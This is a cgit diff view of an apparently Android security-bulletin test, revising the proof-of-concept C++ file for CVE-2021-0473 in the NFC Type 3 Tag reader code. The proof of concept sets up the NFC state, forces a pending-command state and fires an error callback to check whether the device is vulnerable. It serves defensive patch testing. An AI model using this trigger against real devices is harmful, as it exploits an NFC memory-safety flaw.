summaryrefslogtreecommitdiff
path: root/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
diff options
context:
space:
mode:
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp')
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp40
1 files changed, 22 insertions, 18 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
index d7650ad4d5f..152f5384323 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
@@ -92,27 +92,31 @@ void GKI_freebuf(void *ptr) {
}
int main() {
- tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
+ tNFC_ACTIVATE_DEVT p_activate_params = {};
+ p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
+ p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
+ RW_SetActivatedTagType(&p_activate_params, &poc_cback);
+ FAIL_CHECK(rw_cb.p_cback == &poc_cback);
- GKI_init();
- rw_init();
- rw_cb.p_cback = &poc_cback;
+ tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
- uint8_t peerNfcID[NCI_RF_F_UID_LEN];
- uint8_t mrtiCheck = 1, mrtiUpdate = 1;
- if (rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) != NFC_STATUS_OK) {
- return EXIT_FAILURE;
- }
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+
+ uint8_t peerNfcID[NCI_RF_F_UID_LEN];
+ uint8_t mrtiCheck = 1, mrtiUpdate = 1;
+ FAIL_CHECK(rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) == NFC_STATUS_OK);
- tNFC_CONN p_data = {};
- NFC_HDR nfcHdr = {};
- p_data.data.p_data = &nfcHdr;
+ tNFC_CONN p_data = {};
+ NFC_HDR nfcHdr = {};
+ p_data.data.p_data = &nfcHdr;
- tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
- p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
- uint8_t conn_id = NFC_RF_CONN_ID;
- tNFC_CONN_EVT event = NFC_ERROR_CEVT;
- p_cb->p_cback(conn_id, event, &p_data);
- return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+ uint8_t conn_id = NFC_RF_CONN_ID;
+ tNFC_CONN_EVT event = NFC_ERROR_CEVT;
+ p_cb->p_cback(conn_id, event, &p_data);
+ return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
}
generated by cgit v1.2.3 (git 2.25.1) at 2024-06-01 12:40:30 +0000